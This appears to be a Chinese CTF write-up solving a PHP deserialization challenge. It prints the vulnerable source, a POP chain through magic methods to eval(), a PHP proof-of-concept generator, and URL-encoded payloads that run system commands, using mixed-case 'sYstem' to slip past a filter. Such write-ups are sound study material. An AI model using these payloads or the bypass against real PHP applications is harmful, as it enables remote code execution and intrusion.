前言
打比赛做题时发现了一道和NISACTF2022 babyserialize很相似的题,这里记录一下
题目
<?php
include "waf.php";
class CTF{
public $fun="show_me_flag";
public $txw4ever;
public function __wakeup()
{
if($this->fun=="show_me_flag"){
hint();
}
}
function __call($from,$val){
$this->fun=$val[0];
}
public function __toString()
{
echo $this->fun;
return " ";
}
public function __invoke()
{
checkcheck($this->txw4ever);
@eval($this->txw4ever);
}
}
class love{
public $ext;
public $x;
public function __wakeup(){
die("Maybe it failed?");
}
public function __destruct(){
$this->ext->ZZU_ctf_is_fun($this->x);
}
}
class Ilovectf{
public $huang;
public $su;
public function __call($fun1,$arg){
$this->huang->fun=$arg[0];
}
public function __toString(){
$bb = $this->su;
return $bb();
}
}
class four{
public $a="please_don't_copy";
private $fun='abc';
public function __set($name, $value)
{
$this->$name=$value;
if($this->fun=md5($this->fun)){
strtoupper($this->a);
}
}
}
if(isset($_GET['unser'])){
@unserialize($_GET['unser']);
}else{
highlight_file(__FILE__);
}
?>
php反序列化,很明显要通过构造pop链来调用eval函数,参数为我们想要执行的命令
pop链
love::_destruct->Ilovectf::_call->four::_set->Ilovectf::_toString->CTF::_invoke
poc
<?php
class CTF{
public $fun="show_me_flag";
public $txw4ever;
}
class love{
public $ext;
public $x;
}
class Ilovectf{
public $huang;
public $su;
}
class four{
public $a;
private $fun;
}
$ct = new CTF();
$ct->txw4ever = "sYstem('ls /');";#php对函数大小写不敏感,绕过过滤
$b = new love();
$att = new Ilovectf();
$b->ext = $att;
$b->x = "1e3";#只要md5的值不为0都行
$c = new four();
$att->huang = $c;
$c->a = $att;
$att->su = $ct;
echo urlencode(serialize($b));
?>
奇怪的是传参后并没有触发love::_wakeup(明明我在自己的服务器还触发了。。。有没有大佬能解答一下)
payload
?unser=O%3A4%3A%22love%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovectf%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3BN%3B%7Ds%3A2%3A%22su%22%3BO%3A3%3A%22CTF%22%3A2%3A%7Bs%3A3%3A%22fun%22%3Bs%3A12%3A%22show_me_flag%22%3Bs%3A8%3A%22txw4ever%22%3Bs%3A13%3A%22sYstem%28%27ls%27%29%3B%22%3B%7D%7Ds%3A1%3A%22x%22%3Bs%3A3%3A%221e3%22%3B%7D
得到
修改命令为sYstem('cat /fllllaaaaaagggg-c602b1212e9154a40fb6cabeabea64d6')
payload如下:
?unser=O%3A4%3A"love"%3A2%3A%7Bs%3A3%3A"ext"%3BO%3A8%3A"Ilovectf"%3A2%3A%7Bs%3A5%3A"huang"%3BO%3A4%3A"four"%3A2%3A%7Bs%3A1%3A"a"%3Br%3A2%3Bs%3A9%3A"%00four%00fun"%3BN%3B%7Ds%3A2%3A"su"%3BO%3A3%3A"CTF"%3A2%3A%7Bs%3A3%3A"fun"%3Bs%3A12%3A"show_me_flag"%3Bs%3A8%3A"txw4ever"%3Bs%3A64%3A"sYstem%28%27cat+%2Ffllllaaaaaagggg-c602b1212e9154a40fb6cabeabea64d6%27%29%3B"%3B%7D%7Ds%3A1%3A"x"%3Bs%3A3%3A"1e3"%3B%7D
得到flag{It_is_tmd_easy_php_orz}
结语
我觉得p这题主要还是考查对php魔术方法和语言特性(一直没想到用大小写绕过,函数换来换去,菜啊。。。)